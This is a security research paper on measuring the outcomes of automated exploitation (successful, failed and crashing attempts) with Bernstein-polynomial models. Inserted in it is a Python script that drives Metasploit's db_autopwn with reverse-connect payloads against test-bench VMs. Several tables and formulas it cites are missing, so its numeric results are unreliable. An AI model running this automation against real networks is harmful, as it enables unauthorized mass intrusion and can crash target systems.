DEVELOPMENT OF A METHOD FOR CHECKING VULNERABILITIES OF A CORPORATE NETWORK USING BERNSTEIN TRANSFORMATIONS

Roman Kyrychok, PhD, Department of Information and Cyber Security named after Professor Volodymyr Buriachok, Borys Hrinchenko Kyiv University, Bulvarno-Kudriavska str., 18/2, Kyiv, Ukraine, 04053
Oleksandr Laptiev (corresponding author), Doctor of Technical Sciences, Associate Professor, Senior Researcher, Department of Cyber Security and Information Protection*, e-mail: alaptev64@ukr.net
Rostyslav Lisnevskyi, PhD, Associate Professor, Department of Information Systems and Technologies*
Valerii Kozlovskyi, Doctor of Technical Sciences, Professor, Head of Department**
Vitaliy Klobukov, PhD, Assistant**
*Taras Shevchenko National University of Kyiv, Volodymyrska str., 60, Kyiv, 01033
**Department of Information Security, National Aviation University, Liubomyra Huzara ave., 1, Kyiv, Ukraine, 03058

Abstract
One of the leading areas of cybersecurity of communication networks is considered: the introduction of preventive mechanisms, among which the most promising are the methods of active security analysis. In addition to the timely detection of vulnerabilities of the target (analyzed) system, these methods make it possible to confirm that the vulnerabilities can actually be exploited, that is, to validate them by simulating the real actions of a potential attacker. The urgent need to validate vulnerabilities out of the many identified is caused by the fact that some of them may be purely theoretical, while others are exploited using malicious scripts (exploits). At the same time, the process of validating vulnerabilities has practically not been studied. That is why an experimental study of the functioning of modern tools for exploiting vulnerabilities was carried out. Based on the observations, general quantitative characteristics of the vulnerability validation process were identified, and a mathematical model for analyzing these characteristics based on Bernstein polynomials was developed.
It is the polynomial representation of the procedure for confirming the possibility of exploiting the identified vulnerabilities that makes it possible to describe the dynamics of this process, taking into account the complex and volatile nature of the environment. Analytical dependencies are obtained for the number of successful and negative confirmations of vulnerabilities. Negative validation cases include attempts that simply failed to validate a vulnerability, as well as attempts that caused critical errors on the target system during the rational cycle of validating the identified vulnerabilities. The proposed dependencies make it possible to construct the probability distribution laws for the above characteristics of the vulnerability testing process.


Introduction
The latest published data on corporate cybersecurity make it possible to judge how effective the measures taken by companies to protect their corporate networks are. A report [1] released by Accenture in November 2021 states that 55 % of companies (with annual revenue above 1 billion USD) do not prevent cyber attacks effectively: they are too slow to identify and fix vulnerabilities.
One of the leading directions in ensuring the cybersecurity of the communication networks of enterprises and institutions is the introduction not only of mechanisms for detecting cyber attacks, but also of preventive mechanisms. Among them, the most promising are the methods of active analysis of the security of corporate networks. In addition to the timely detection of vulnerabilities of the target (analyzed) system, these methods make it possible to check them, that is, to confirm that specific vulnerabilities can be exploited by simulating the real actions of a potential attacker. Verification of the identified vulnerabilities is the key element of active security analysis, since some vulnerabilities are purely theoretical, while others can be exploited using known exploits. It should be noted that a network connected to the Internet faces both internal threats, from inexperienced users, and external ones, including cyber attacks. Depending on their goals, attackers can implement entire attack strategies consisting of multi-stage attack chains. Therefore, improving the technologies for the timely detection and closing of vulnerabilities in corporate networks, which minimize the risk of a cyber attack, is an urgent issue [2, 3].

Literature review and problem statement
Based on the experience gained so far, it can be argued that cyberspace, de facto and de jure, has become a new theater of war.
For example, article [4] discusses theories and practices of cybersecurity. The analysis presented in the work shows that, in order to disable the critical information infrastructure of a state, an attacker or an opposing party carries out cyber attacks using special samples of malicious software, so-called cyber weapons, such as Stuxnet, Gauss, Duqu, Wiper, Flame, miniFlame, Uroburos (Snake), etc. However, no clear actions, methods or techniques for countering these threats are given.
Article [5] shows that such attacks are designed exclusively for a specific computer network and are aimed at its most vulnerable components. Typically, such malware samples target a zero-day vulnerability. However, the methodology for checking attacks and real threats to computer networks is not considered.
Article [6] deals with threats to computer systems and military networks. Examples are given showing that the implementation of such potentially dangerous cyber attacks is unacceptable, since the failure of control processes in such systems would prevent them from fulfilling their tasks. The study of world experience has shown that the number of cyber attacks on computer systems and networks of critical infrastructure is constantly increasing. At the same time, their technological complexity grows, which in turn makes it impossible or difficult for information security systems to detect them. The information security systems currently used to detect cyber attacks are not fully capable of detecting potentially dangerous attacks, as evidenced by incidents that have taken place in the world.
Article [7] provides a general analysis of cyber attacks. It shows that the detection of attacks still relies mainly on signature-based approaches to the construction of cyber attack templates, which are characterized by a «delay effect» in the development of the necessary signature. Therefore, other, alternative approaches are needed, focused on the detection of new, potentially dangerous cyber attacks.
Article [8] substantiates the claim that the scientific task of providing the necessary level of protection of computer systems and networks from potentially dangerous cyber attacks requires a new and effective method for constructing their templates. It is shown that the methodology for constructing patterns of potentially dangerous cyber attacks is rather complicated. The need to ensure high reliability of detection requires taking into account many informative characteristics or signs of a potentially dangerous cyber attack. Because the formats of these characteristics are defined differently by different vendors of information security systems, in practice there is an imbalance in reducing them to one metric system. As a result, it becomes impossible to use the characteristics of potentially dangerous cyber attacks to create their templates.
Article [9] considers the reasons for violations of the information security of computer networks. The main reasons cited are vulnerabilities in operating systems and applications, the presence of vulnerable or easily attacked services, malicious software, etc. It also mentions the danger of incorrect configuration of hardware and software and of errors made when setting up access control. Using combinations of existing vulnerabilities and flaws in the network configuration and the applied security policy, attackers (both external and internal), depending on their goals, can implement a variety of attack strategies. However, the methodology for checking attacks and real threats to computer networks is not considered.
Article [10] notes that any company uses the wide opportunities provided by the Internet in its activities. However, along with the opportunities, the World Wide Web brings many threats to information security, and the implementation of these threats can lead to significant material and reputational damage to the business. The types of network attacks and the ways of their implementation are considered. However, the methodology for identifying vulnerabilities in software and hardware platforms for the automated active analysis of the security of target corporate networks is not given.
At the same time, despite a significant number of publications on addressing various aspects of improving security and methods for identifying vulnerabilities, it becomes clear that the vulnerability analysis process remains ineffective [11][12][13][14][15]. There is no clearly described practical implementation of the rapid detection of vulnerabilities in enterprise computer networks. That is, there is a contradiction between the need for prompt (real-time), high-quality detection and verification of vulnerabilities in enterprise communication networks and the capabilities of existing methods for automating the process of actively analyzing their security.

The aim and objectives of research
The aim of this research is to develop an effective method for checking the vulnerabilities of software and hardware platforms for the automated active analysis of the security of target corporate networks. This will make it possible to minimize the risk of cyber incidents associated with the presence of vulnerabilities in the target systems of the organization's information infrastructure and, in addition, to compensate for the shortage of highly qualified specialists in the active analysis of the security of corporate networks.
To achieve the aim, the following objectives were set:
- conduct an experimental and practical study of the process of checking the vulnerabilities of information systems using special plug-ins that automate this process in a modern vulnerability exploitation tool;
- develop a mathematical model for analyzing the quantitative characteristics of the vulnerability testing process, taking into account the complex and volatile nature of the environment;
- simulate the analysis of the quantitative characteristics of the vulnerability testing process and obtain analytical dependencies for the number of successful and negative confirmations of vulnerabilities;
- perform a theoretical substantiation of the adequacy of the obtained analytical dependencies.

Materials and methods of research
The idea of preventive mechanisms for ensuring the information security of the communication networks of enterprises and institutions is to identify weaknesses before an intruder attacks. In this study, weaknesses are understood not as architectural flaws (admitted at the design stage) but primarily as «operational gaps», that is, vulnerabilities. Such problems often arise during the operation of networks as a result of administrative errors or untimely software updates on individual information systems. Moreover, by putting oneself in the position of a potential attacker, it is possible to determine the methods of intrusion, the obstacles an attacker might encounter, and the specific resources and materials that can be reached [16-20].
On this basis, network security is understood as a state of the network that makes it possible to resist any cyber attacks or the possible implementation of particular threats to information security, preserving the confidentiality, integrity and availability of data and network components. Security analysis is the process of checking the network infrastructure and the network perimeter for possible vulnerabilities, including errors in configuration, software and application source code.
All experiments were performed on a machine running Windows 10 Pro x64 v1803 with an Intel Core i5-3210M CPU at 2.50 GHz and 12 GB RAM, using the VMware Workstation 12 Pro v12.5.9 build-7535481 virtualization platform, on which a special test bench was deployed. A schematic representation of this bench is shown in Fig. 1. It should be noted that the sample of target platforms was formed taking into account statistical data from Netmarketshare and Statcounter on the prevalence of particular operating systems in the world [28, 29]. According to these data, about 20 % of respondents in the business environment continue to use outdated versions, and the share is even higher in government institutions.
All experiments consisted of a series of automatic security analyses of the same target hosts using the above exploits, followed by analysis of the results of their work.
To conduct these experiments, a special technique was developed, which provides for the following system of actions:
1. After deploying the test bench and setting up all target hosts, create snapshots (VMware snapshots) of each virtual machine to preserve its original (initial) state. A virtual machine snapshot is a copy of the virtual machine disk file (VMDK) at a specific point in time that makes it possible to restore the saved state of the virtual machine.
2. Analyze the security of the next host with the Armitage graphical cyber attack management tool in the Hail Mary exploitation mode, save the results and restore the VMware image of the investigated target host to its original state.
3. Analyze the security of the next host with the db_autopwn automation and cyber attack plugin, save the results and restore the VMware image of the investigated target host to its original state.
4. If a critical error occurs during the active security analysis in step 2 or 3, restore the original state of the investigated target host and re-analyze it, excluding from the list the exploits that led to this error.
5. Arrange the results of the experiments in the form of a table.
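The snapshot, exploit, restore and tabulate loop above can be scripted. The following is an added example, not the tooling used in the paper. It assumes VMware Workstation's `vmrun` CLI and Metasploit's `msfconsole` are on PATH, that the `db_autopwn` plugin is installed, and that a "critical error" (step 4) is detected as the target no longer answering ICMP echo after the run, which stands in for the paper's criterion of loss of communication. The VMX paths, snapshot name and target addresses are hypothetical, and the Armitage Hail Mary pass (step 2) is GUI-driven and is not scripted here.

```python
"""Automation of the snapshot / exploit / restore loop of the test bench.

Added example, not the paper's tooling.  Assumes `vmrun` and `msfconsole`
on PATH, the db_autopwn plugin installed, and ICMP reachability as the
loss-of-communication signal.  VMX paths, snapshot name and target IPs
are hypothetical.
"""
import re
import subprocess
import tempfile
from pathlib import Path

SNAPSHOT = "clean"  # hypothetical name of the snapshot taken in step 1
TARGETS = [  # hypothetical test-bench hosts: (vmx path, target IP)
    ("/vms/win7-sp1/win7.vmx", "192.168.56.101"),
    ("/vms/ubuntu-14.04/ubuntu.vmx", "192.168.56.102"),
]

# messages msfconsole prints per exploit attempt; counted per run
SESSION_OPENED = re.compile(r"session \d+ opened")
ATTEMPT_FAILED = re.compile(r"Exploit failed|no session was created")


def vmrun(*args, dry_run=False):
    """Run (or, in dry-run mode, only return) a VMware Workstation command."""
    cmd = ["vmrun", "-T", "ws", *args]
    if not dry_run:
        subprocess.run(cmd, check=True)
    return cmd


def build_resource_script(target_ip, workspace):
    """msfconsole resource script for step 3: scan, load db_autopwn, exploit."""
    return "\n".join([
        f"workspace -a {workspace}",
        f"db_nmap -sV -Pn {target_ip}",
        "load db_autopwn",
        # match modules by open port, launch them, use reverse-connect payloads
        f"db_autopwn -p -t -e -r -I {target_ip}",
        "exit -y",
    ]) + "\n"


def count_outcomes(msf_output):
    """(q_s, q_f) for one run: sessions opened vs. attempts that failed."""
    return (len(SESSION_OPENED.findall(msf_output)),
            len(ATTEMPT_FAILED.findall(msf_output)))


def host_reachable(ip, dry_run=False):
    """ICMP reachability check used as the loss-of-communication signal."""
    if dry_run:
        return True
    return subprocess.run(["ping", "-c", "1", "-W", "2", ip],
                          stdout=subprocess.DEVNULL).returncode == 0


def classify_run(msf_output, reachable_after):
    """Vector (q_s, q_f, q_c) for one host; q_c = 1 when the target was lost."""
    q_s, q_f = count_outcomes(msf_output)
    return {"q_s": q_s, "q_f": q_f, "q_c": 0 if reachable_after else 1}


def check_host(vmx, target_ip, dry_run=False):
    """Steps 1, 3 and 4 for one host: revert, run db_autopwn, classify, revert."""
    vmrun("revertToSnapshot", vmx, SNAPSHOT, dry_run=dry_run)
    vmrun("start", vmx, "nogui", dry_run=dry_run)
    rc = Path(tempfile.mkdtemp()) / f"autopwn_{target_ip}.rc"
    rc.write_text(build_resource_script(target_ip, "bench"))
    output = ""
    if not dry_run:
        output = subprocess.run(["msfconsole", "-q", "-r", str(rc)],
                                capture_output=True, text=True).stdout
    result = classify_run(output, host_reachable(target_ip, dry_run))
    # step 4: a crashed target is restored before the next run either way
    vmrun("revertToSnapshot", vmx, SNAPSHOT, dry_run=dry_run)
    return result


def run_bench(targets=TARGETS, dry_run=False):
    """Step 5: one (q_s, q_f, q_c) row per host, ready for tabulation."""
    return {ip: check_host(vmx, ip, dry_run=dry_run) for vmx, ip in targets}


if __name__ == "__main__":
    for ip, row in run_bench(dry_run=True).items():
        print(ip, row)
```

db_autopwn has no flag to exclude a single module, so the exclusion in step 4 is done by narrowing the selection with its `-m <regex>` option (module name match) in the resource script before the re-run; the counts use the exploit-completion messages msfconsole prints, not the database, so they also work when the target is lost mid-run.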

Results of research on the development of an effective method for checking the vulnerabilities of software and hardware platforms of target corporate networks

1. Experimental and practical study of the process of checking the vulnerabilities of information systems using the vulnerability exploitation toolkit
Using the system of actions presented above, a series of observations of the operation of automated means of exploiting the discovered vulnerabilities was carried out. As a result, it was found that the process of validating the vulnerabilities of the hosts of the target corporate network can be represented by a vector (q_s, q_f, q_c) in a three-dimensional space. The abscissa q_s is the number of successfully validated vulnerabilities of the target system, the ordinate q_f is the number of unsuccessful vulnerability checks, and the applicate (z-coordinate) q_c is the number of validation attempts that caused a critical error in the target system and subsequent loss of communication with it.
The statistical data obtained in the experimental and practical study are given in Table 1.
In Table 1, the number of attempts is the total number of attempts to exploit the identified vulnerabilities of an individual host of the target corporate network, and t is the total time of checking the identified vulnerabilities of an individual host of the target corporate network, in seconds.
Analysis of the data in Table 1 shows that each coordinate of the vector (q_s, q_f, q_c) changes continuously over the time during which the active security analysis of the corporate network is carried out, and that the three coordinates are connected by a functional dependence.

2. Development of a mathematical model for analyzing the quantitative characteristics of the vulnerability testing process
Unlike deterministic dynamic systems, which can be described by differential equations derived from the nature of the system, the vulnerability-checking process is not deterministic: repeated runs against the same host do not yield a unique trajectory of (q_s, q_f, q_c).
Therefore, the model is built on a polynomial estimate based on the first Weierstrass theorem, one of the main approaches to nonparametric approximation. The theorem states: if the function f(x) is continuous on the segment [a, b], then there is a sequence of polynomials {P_n(x)} that converges uniformly on [a, b] to f(x). That is, for any ε > 0 there is a polynomial P_n(x), whose degree n depends on ε, such that
$|f(x) - P_n(x)| < \varepsilon$ for all x on the segment [a, b].
A constructive proof of this theorem was given by S. N. Bernstein in 1912 [2]. The following polynomials are used as the approximating polynomials P_n(x):
$b_{k,n}(x) = \binom{n}{k} x^{k} (1-x)^{n-k}, \qquad B_n(f; x) = \sum_{k=0}^{n} f\!\left(\frac{k}{n}\right) b_{k,n}(x), \qquad k = 0, 1, \ldots, n.$ (1)
The function b_{k,n}(x) is called the basic Bernstein polynomial of degree n, the operator B_n(f; x) is the Bernstein polynomial of order n for the function f(x), and the coefficients f(k/n) are called the Bernstein coefficients.
In [2], on the basis of elementary results of probability theory, it is proved that the sequence of polynomials {B_n(f; x)} converges to f(x) uniformly on [0, 1] as n → ∞:
$\lim_{n \to \infty} \max_{x \in [0,1]} |B_n(f; x) - f(x)| = 0.$
If, in addition, the function f(x) satisfies the Lipschitz condition [3] with constant M on [0, 1], the rate of convergence is bounded by the classical estimate
$|B_n(f; x) - f(x)| \le M \sqrt{\frac{x(1-x)}{n}} \le \frac{M}{2\sqrt{n}}, \qquad x \in [0, 1].$ (2)
Thus, since differential equations cannot be used, Bernstein polynomials were chosen to build the mathematical model for analyzing the quantitative characteristics of the vulnerability-checking process: the sampled counts are approximated directly by (1), and (2) links the degree n to the attainable accuracy.

3. Analysis of the quantitative characteristics of the process of checking vulnerabilities using the method of mathematical modeling
Based on the results of the experimental study of the operation of modern automated means of exploiting vulnerabilities (Table 1), a mathematical model for analyzing the quantitative characteristics of the process of checking the vulnerabilities of information systems was built using regression analysis. First, the statistical relationship between the variable t and each of q_s, q_f, q_c was evaluated for the validation mechanism of the Armitage graphical cyber attack management tool using the sample correlation coefficient R.
From the data of Table 1, the auxiliary values were calculated: the sample means ($\bar{t}$, $\bar{q}$), the variances (D_t, D_q) and the standard deviations (σ_t, σ_q), from which
$R = \frac{\frac{1}{n}\sum_{i=1}^{n} (t_i - \bar{t})(q_i - \bar{q})}{\sigma_t \sigma_q}.$
The results are shown in Table 2. From the data of Table 2 it follows that there is a linear relationship between t and each of q_s, q_f, q_c, since none of the values of R is equal to zero.
The closest linear relationship is observed between t and q_f; accordingly, as one of these values increases, the other on average increases as well.
In addition, whether the sample value R corresponds to a non-zero correlation ρ between the general populations of t and q_s, q_f, q_c was checked with Student's t-test, that is, by comparing
$t_{calc} = \frac{R\sqrt{n-2}}{\sqrt{1-R^{2}}}$
with the tabulated value t_table for f = n − 2 degrees of freedom at significance level α. The values of t_calc are given in Table 3. Comparing t_calc with the theoretical values for f = n − 2 = 9 and α = 5 % gives the following results:
- for t, q_s: t_calc > t_table, namely 2.254 > 2.096, which indicates a direct relationship between the time of checking the identified vulnerabilities and the number of successfully checked vulnerabilities;
- for t, q_f: t_calc > t_table, namely 4.693 > 2.096, which indicates a significant direct relationship between the time of checking the identified vulnerabilities and the number of unsuccessful checks;
- for t, q_c: t_calc < t_table, namely 0.216 < 2.096, which indicates that the relationship between the time of checking the identified vulnerabilities and the number of checks that led to critical errors on the target host is very weak and statistically insignificant.
From the data of Table 1 it follows that the time of a rational vulnerability-checking cycle for the Armitage tool is 345 seconds. Therefore, the time interval is first normalized as
$t_n = \frac{t_i}{T},$ (3)
where t_n is the normalized time, T is the vulnerability-checking time of the target host in seconds (the rational cycle time), and t_i is the time at which the corresponding characteristics (q_s, q_f, q_c) took their values within the rational cycle.
The results of normalization of the time interval are presented in Table 4.
Then the values of the variables q_s(t_n), q_f(t_n), q_c(t_n), as functions of the normalized time, are given in Table 5.
Using the data of Table 5 and expression (1) with n = 11, the initial analytical dependence for the number of successfully checked vulnerabilities q_s = q_s(t_n) is
$q_s(t_n) = B_{11}(q_s; t_n) = \sum_{k=0}^{11} q_s\!\left(\frac{k}{11}\right) b_{k,11}(t_n).$ (4)
After substituting the corresponding values from Table 5 and simplifying, the expression takes its final polynomial form (5).
Table 6 gives the basic Bernstein polynomials b_{k,11}(t_n) for k = 0, 1, ..., 11, obtained from (1) with the binomial coefficients $\binom{11}{k}$ = 1, 11, 55, 165, 330, 462, 462, 330, 165, 55, 11, 1.
Table 6 Basic Bernstein polynomials of degree 11
k | b_{k,11}(t)
0 | (1-t)^11
1 | 11t(1-t)^10
2 | 55t^2(1-t)^9
3 | 165t^3(1-t)^8
4 | 330t^4(1-t)^7
5 | 462t^5(1-t)^6
6 | 462t^6(1-t)^5
7 | 330t^7(1-t)^4
8 | 165t^8(1-t)^3
9 | 55t^9(1-t)^2
10 | 11t^10(1-t)
11 | t^11
Similarly, using (1) and the data of Table 5, the initial analytical dependencies for the number of unsuccessful checks q_f = q_f(t_n) and for the number of checks that led to critical errors q_c = q_c(t_n) are
$q_f(t_n) = \sum_{k=0}^{11} q_f\!\left(\frac{k}{11}\right) b_{k,11}(t_n),$ (6)
$q_c(t_n) = \sum_{k=0}^{11} q_c\!\left(\frac{k}{11}\right) b_{k,11}(t_n).$ (7)
Substituting the values of Table 5 into (4), (6) and (7) gives the final expressions (8) for the three studied characteristics of the process of validating the vulnerabilities of information systems. It is this polynomial representation of the procedure for confirming the possibility of exploiting the identified vulnerabilities that makes it possible to describe the dynamics of the vulnerability validation process, taking into account the complex and volatile nature of the environment. Table 7 presents the calculated values of q_s(t_n) next to the data of Table 5.
Table 7 Comparative values for q_s(t_n)
From the data of Table 7 it can be seen that the function q_s = q_s(t_n) of successful vulnerability checks satisfies the Lipschitz condition [3]
$|q_s(t') - q_s(t'')| \le M\,|t' - t''|, \qquad t', t'' \in [0, 1].$ (9)

4. Justification of the adequacy of the obtained analytical dependences
It follows from condition (9) that the graph of the function q_s = q_s(t_n) is confined to a bounded rectangular region of the (t_n, q_s) plane outside of which it is not defined. This makes it possible in the future to construct probability distribution laws for the number of successfully checked vulnerabilities. In addition, when condition (9) is satisfied, estimate (2) holds for q_s(t_n), and the resulting dependence (11) of the approximation error on the degree n allows the degree of the Bernstein polynomial to be chosen for the required accuracy.
Thus, using the data of Table 7 and dependence (11), the maximum deviation for q_s = q_s(t_n) at n = 11 was determined. Generalized data were obtained in the same way by modeling the other quantitative characteristics of the vulnerability-checking process, namely the number of unsuccessful checks and the number of checks that led to critical errors during the rational cycle of checking the identified vulnerabilities. The results of the corresponding comparisons are given in Tables 8 and 9.
Table 8 Comparative values for q_f(t_n)
Table 9 Comparative values for q_c(t_n)
In addition, the maximum deviations for q_f(t_n) and q_c(t_n) were determined from the data of Tables 8 and 9 and dependence (11). Analysis of the data in Tables 7-9 shows a certain deviation, caused by the small number of terms taken in the study, but this deviation is acceptable.
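The computations of sections 2-4 (correlation coefficient R and its t-test, normalization (3), the Bernstein fit (1), (4), (6), (7) at degree 11, and the Lipschitz error estimate (2)) can be carried through in code. The following is an added example, not the authors' own calculation. The observations are constructed for illustration and do not reproduce Tables 1-9 or the paper's R and t_calc values: twelve cumulative (q_s, q_f, q_c) counts sampled at t_i = k·T/11 with T = 345 s, so that t_n lands exactly on the Bernstein nodes k/11. The Lipschitz constant M is estimated from the sample itself, and the bound checked is the classical M/(2√n), which is only assumed here to be the form of the paper's dependence (11).

```python
"""Bernstein-polynomial model of one vulnerability-validation cycle.

Added example.  The rows below are CONSTRUCTED, not the paper's Table 1 /
Table 5 data: (t_i seconds, q_s, q_f, q_c) = cumulative successful checks,
failed checks and checks that crashed the target, sampled at t_i = k*T/11.
"""
from math import comb, sqrt

T_CYCLE = 345.0  # rational cycle time T in seconds quoted in the text

SAMPLES = [(k * T_CYCLE / 11, qs, qf, qc) for k, (qs, qf, qc) in enumerate([
    (0, 0, 0), (0, 2, 0), (1, 5, 0), (1, 7, 1), (2, 10, 1), (3, 14, 1),
    (3, 17, 1), (4, 21, 2), (4, 24, 2), (5, 28, 2), (5, 31, 2), (6, 34, 2),
])]


def normalise_time(t_seconds, cycle=T_CYCLE):
    """Expression (3): t_n = t_i / T maps the rational cycle onto [0, 1]."""
    return t_seconds / cycle


def pearson_r(xs, ys):
    """Sample correlation coefficient R between two equal-length series."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sxx = sum((x - mx) ** 2 for x in xs)
    syy = sum((y - my) ** 2 for y in ys)
    return sxy / sqrt(sxx * syy)


def t_statistic(r, n):
    """Student t for testing rho = 0 from sample R with n - 2 degrees of freedom."""
    return r * sqrt(n - 2) / sqrt(1.0 - r * r)


def bernstein_basis(k, n, x):
    """Basic Bernstein polynomial b_{k,n}(x) = C(n,k) x^k (1-x)^(n-k)."""
    return comb(n, k) * x ** k * (1.0 - x) ** (n - k)


def bernstein_poly(node_values, x):
    """B_n(f; x) = sum_k f(k/n) b_{k,n}(x) with n = len(node_values) - 1."""
    n = len(node_values) - 1
    return sum(f_k * bernstein_basis(k, n, x) for k, f_k in enumerate(node_values))


def lipschitz_constant(xs, ys):
    """Smallest M with |f(x_i) - f(x_j)| <= M |x_i - x_j| over all sample pairs."""
    return max(abs(ys[i] - ys[j]) / abs(xs[i] - xs[j])
               for i in range(len(xs)) for j in range(i + 1, len(xs)))


def lipschitz_error_bound(m, n):
    """Classical bound sup |B_n(f; x) - f(x)| <= M / (2 sqrt n) for Lipschitz-M f."""
    return m / (2.0 * sqrt(n))


def max_node_deviation(node_values):
    """Largest |B_n(f; k/n) - f(k/n)|: Bernstein polynomials smooth, they do not interpolate."""
    n = len(node_values) - 1
    return max(abs(bernstein_poly(node_values, k / n) - f_k)
               for k, f_k in enumerate(node_values))


def analyse_cycle(samples=SAMPLES):
    """Correlation with time and degree-11 Bernstein fit for q_s, q_f, q_c."""
    times = [normalise_time(row[0]) for row in samples]
    report = {}
    for idx, name in ((1, "q_s"), (2, "q_f"), (3, "q_c")):
        values = [row[idx] for row in samples]
        r = pearson_r(times, values)
        m = lipschitz_constant(times, values)
        report[name] = {
            "R": r,
            "t_calc": t_statistic(r, len(values)),
            "lipschitz_M": m,
            "max_deviation": max_node_deviation(values),
            "error_bound": lipschitz_error_bound(m, len(values) - 1),
        }
    return report


if __name__ == "__main__":
    for name, stats in analyse_cycle().items():
        print(name, {key: round(val, 3) for key, val in stats.items()})
```

Because B_n reproduces only the endpoint values and linear functions exactly, the fitted polynomial deviates from the sampled counts at the interior nodes; `max_node_deviation` measures exactly the deviation reported in Tables 7-9, and comparing it with `lipschitz_error_bound` is the check that estimate (2) performs. Raising n (more samples per cycle) shrinks the bound as 1/√n, which is the mechanism behind the remark that the deviations decrease as the number of values grows.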

Discussion of the results on the development of an effective method for checking the vulnerabilities of software and hardware platforms of target corporate networks
In the course of an experimental study of the functioning of modern vulnerability exploitation tools, generalized characteristics of the vulnerability verification process were identified: the number of successfully checked vulnerabilities of the target system, q_s, and the number of negative confirmations of vulnerabilities. The latter comprise the number of unsuccessful vulnerability checks, q_f, and the number of validation attempts that caused a critical error in the target system and subsequent loss of communication, q_c.
In the course of modeling the analysis of the above quantitative characteristics of the vulnerability testing process, analytical dependencies (8) were derived, which fully reflect the dynamics of this process.
Comparison of the empirical data obtained in the study of the process of checking the vulnerabilities of information systems with vulnerability exploitation tools against the calculated values shows an acceptable deviation (Tables 7-9). As the number of values increases, these deviations become smaller. At the same time, for further research related to failed validation attempts and to attempts that led to critical errors, this difference is not significant.
Thus, the proposed analytical dependencies make it possible to construct the probability distribution laws of the above characteristics of the vulnerability validation process. This is the distinctive feature of the developed method.
However, it should be noted that the vulnerability validation process checks vulnerabilities using only known exploits. This approach is somewhat limited, because checks for the exploitability of previously unknown vulnerabilities, for example zero-day vulnerabilities, remain unaccounted for; this requires further development.
The disadvantage of the developed method is the increase in computation time, but this disadvantage is not critical given the rapid development of computer technology. A direction for further research is the improvement of the method by taking into account additional factors of vulnerability analysis that fell outside the scope of consideration during the development of this method.

Conclusions
1. In the course of an experimental study of the functioning of modern vulnerability exploitation tools, generalized characteristics of the vulnerability verification process have been identified: the number of successfully checked vulnerabilities of the target system, the number of unsuccessful checks, and the number of validation attempts that caused a critical error in the target system and subsequent loss of communication. These characteristics take into account the complex and changing nature of the environment, as well as the risk of a critical error in the functioning of the target system when exploiting vulnerabilities.
2. A mathematical model has been developed for analyzing the quantitative characteristics of the vulnerability testing process, taking into account the complex and volatile nature of the environment. A feature of the developed model is the use of Bernstein polynomial transformations.
3. In the course of modeling the analysis of the generalized quantitative characteristics of the vulnerability testing process, their analytical dependencies have been derived, which fully reflect the dynamics of this process.
4. Comparison of the empirical data obtained in the full-scale modeling of the process of checking the vulnerabilities of information systems with the calculated values shows that the deviation does not exceed 20 %. The error of the results obtained in identifying critical vulnerabilities was no more than 17 %, which confirms the adequacy of the developed model.